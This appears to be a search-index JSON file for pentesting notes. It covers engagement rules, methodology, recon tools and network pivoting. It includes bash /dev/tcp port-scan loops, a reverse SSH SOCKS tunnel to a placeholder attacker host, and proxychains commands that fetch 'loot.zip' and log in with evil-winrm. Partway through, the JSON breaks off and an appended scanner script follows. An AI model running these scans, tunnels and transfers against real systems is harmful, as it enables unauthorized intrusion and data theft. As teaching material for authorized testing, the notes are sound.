husk/build/index.json


2022-09-02 09:05:59 +02:00
{"index":[{"content":"Pentesting* [Pentesting Execution Standard](http://www.pentest-standard.org/index.php/Main_Page)\nAuthorized audit of the security of computer systems and networks.\n* [Rules of Engagement -- Cheat Sheet](https://sansorg.egnyte.com/dl/bF4I3yCcnt/?) and [redteam.guide ROEs](https://redteam.guide/docs/templates/roe_template/)\n * Permissions\n * Engagement --> internal/external pentest or adversary emulation of APTs\n * Scope --> networks, IPs, exfiltration of data, which stage, downtime, DDoS\n * Rules\n* NDA\n\n## Campaign\n* [Checklist](https://redteam.guide/docs/checklists/red-team-checklist/)\n* [vectr.io](https://vectr.io)\n\n* Engagement --> Concept of Operations (CONOPS), Resource and Personnel Requirements, Timelines\n* Operations --> Operators, Known Information, Responsibilities\n* Mission --> Exact commands to run and execution time of the engagement\n* Remediation --> Report, Remediation consultation\n\n## Methodology\n\n* Steps\n * Reconnaissance\n * Enumeration/Scanning\n * Gaining Access\n * Privilege Escalation\n * Covering Tracks\n * Reporting\n\n### Reconnaissance\n* Duck / SearX / metacrawler / google\n* Wikipedia\n* [Shodan.io](http://www.shodan.io)\n* PeopleFinder.com\n* who.is\n* sublist3r\n* hunter.io\n* builtwith.com\n* wappalyzer\n\n### Enumeration\n* nmap\n* nikto\n* gobuster\n* dirbuster\n* metasploit\n* enum4linux / linpeas / winpeas / linenum\n\n### Exploitation\n\n### Post Exploitation\n* Pivoting\n#### Privilege Escalation\n* Vertically or horizontally\n\n#### Covering Tracks\n\n#### Reporting\n* Includes\n * Vulnerabilities\n * Criticality\n * Description\n * Countermeasures\n * Finding summary\n\n## Frameworks\n* [OSSTMM3](https://www.isecom.org/OSSTMM.3.pdf)\n* [NIST](https://www.nist.gov/cyberframework)\n* [CAF](https://www.ncsc.gov.uk/collection/caf/caf-principles-and-guidance)\n\n## Testing Webapps\n\n* Two methods\n1. Every page and its functions one by one\n2. 
Test by stages\n * Authorization\n * Authentication\n * Injection\n * Client Side Controls\n * Application Logic\n","description":"","tags":[],"title":"Pentesting","uri":"/README.html"},{"content":"Pivoting\n* Tunnelling/Proxying\n* Port Forwarding\n\n## Enumeration\n### Using material found on the machine and preinstalled tools\n* `arp -a`\n* `/etc/hosts` or `C:\\Windows\\System32\\drivers\\etc\\hosts`\n* `/etc/resolv.conf`\n* `ipconfig /all`\n* `nmcli dev show`\n* [Statically compiled tools](https://github.com/andrew-d/static-binaries.git)\n\n### Scripting Techniques\n```sh\n# ICMP sweep of a /24: each ping runs in a background subshell\nfor i in {1..255}; do (ping -c 1 192.168.0.${i} | grep \"bytes from\" &); done\n# TCP connect scan with the bash /dev/tcp pseudo-device (no nmap needed on the box)\nfor i in {1..65535}; do (echo > /dev/tcp/192.168.0.1/$i) >/dev/null 2>&1 && echo $i is open; done\n```\n* Run local tools such as `nmap` through a SOCKS proxy (proxychains) instead of uploading them\n\n## Tools\n\n* Enumerating a network using native and statically compiled tools\n\n### Proxychains / FoxyProxy\n\n* When dynamic port forwarding is needed, open a reverse SOCKS proxy from the jumpserver back to the attacker's box so proxychains can use it (OpenSSH 7.6+ treats `-R <port>` without a destination as a reverse dynamic forward; the SOCKS listener appears on the attacker's side)\n ```sh\n ssh <username>@$ATTACKER_IP -R 9050 -N\n ```\n* Proxychains, e.g. 
scan a target via nmap, or connect via nc through the jump server (only full TCP connect scans traverse a SOCKS proxy, so use `-sT -Pn`; SYN scans and ICMP host discovery are not proxied)\n ```sh\n proxychains nc <IP> <PORT>\n proxychains nmap -sT -Pn <IP>\n proxychains ssh user@$TARGET_IP\n proxychains evil-winrm -i $TARGET_IP -u $USER -p $PASS\n proxychains wget http://$TARGET_IP:8000/loot.zip\n ```\n * Use `/etc/proxychains.conf` or `./proxychains.conf` containing (uncomment `proxy_dns` if name lookups must go through the tunnel as well):\n ```sh\n [ProxyList]\n # add proxy here ...\n # meanwhile\n # defaults set to \"tor\"\n socks4 127.0.0.1 9050\n #socks5 127.0.0.1 1337\n # proxy_dns\n ```\n* FoxyProxy: set the proxy type, proxy IP and port in its settings\n\n### SSH port forwarding and tunnelling (primarily Unix)\n\n* LocalPortForwarding\n ```sh\n ssh -L $LOCAL_PORT:<IP_seen_from_Jumpserver>:<Port_seen_from_Jumpserver> <user>@<Jumpserver> -fN\n ```\n * Alternatively, from the jumpserver's own CLI: `ssh <username>@<jumpserver> -L *:$LOCAL_PORT:127.0.0.1:80 -N`.
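The "Scripting Techniques" one-liners above show the idea of enumerating from a pivot box with nothing but bash; the script below is an added example (not from the original page or its author) that turns them into reusable functions with a connect timeout, bounded parallelism and sorted output. It assumes bash 4 or newer on the jumpserver, the coreutils `timeout` binary and Linux iputils `ping`; the 192.168.0.0/24 addresses are placeholders for a lab network.

```bash
#!/usr/bin/env bash
# Host and port discovery from a pivot box with bash builtins only (/dev/tcp, ping).
# Added example, not from the original page. Assumes bash >= 4 on the jumpserver,
# coreutils `timeout`, and Linux iputils `ping` (-W is seconds there, ms on BSD).
# The 192.168.0.0/24 addresses below are placeholders for the lab network.

# Expand a port spec such as "22,80,8000-8002" into a space-separated list.
expand_ports() {
  local spec=$1 part
  local -a parts out
  IFS=',' read -ra parts <<< "$spec"
  for part in "${parts[@]}"; do
    if [[ $part == *-* ]]; then
      out+=( $(seq "${part%-*}" "${part#*-}") )
    else
      out+=( "$part" )
    fi
  done
  echo "${out[*]}"
}

# Return 0 when host:port completes a TCP handshake within $secs (default 1 s).
# A plain `echo > /dev/tcp/...` blocks until the kernel gives up on a filtered
# port, so the connect runs under `timeout` in a child bash.
tcp_open() {
  local host=$1 port=$2 secs=${3:-1}
  timeout "$secs" bash -c "exec 3<>/dev/tcp/$host/$port" >/dev/null 2>&1
}

# Probe the given ports on one host with at most MAX_JOBS probes in flight;
# open ports are printed one per line, numerically sorted.
MAX_JOBS=${MAX_JOBS:-64}
port_scan() {
  local host=$1 spec=$2 port n=0
  (
    for port in $(expand_ports "$spec"); do
      { tcp_open "$host" "$port" && echo "$port"; } &
      if (( ++n % MAX_JOBS == 0 )); then wait; fi
    done
    wait
  ) | sort -n
}

# ICMP sweep of a /24 prefix: print every address answering one echo request.
ping_sweep() {
  local prefix=$1 first=${2:-1} last=${3:-254} i
  (
    for i in $(seq "$first" "$last"); do
      { ping -c 1 -W 1 "$prefix.$i" >/dev/null 2>&1 && echo "$prefix.$i"; } &
    done
    wait
  ) | sort -t. -k4,4n
}

# Typical use from the jumpserver (placeholder network):
#   ping_sweep 192.168.0 1 254
#   port_scan 192.168.0.1 "21,22,80,443,8000-8100"
```

Keep `MAX_JOBS` modest on a production pivot host: a full 65535-port probe with unbounded background jobs is a fork bomb for the box you are trying not to crash, and connect scans are loud in the target's logs.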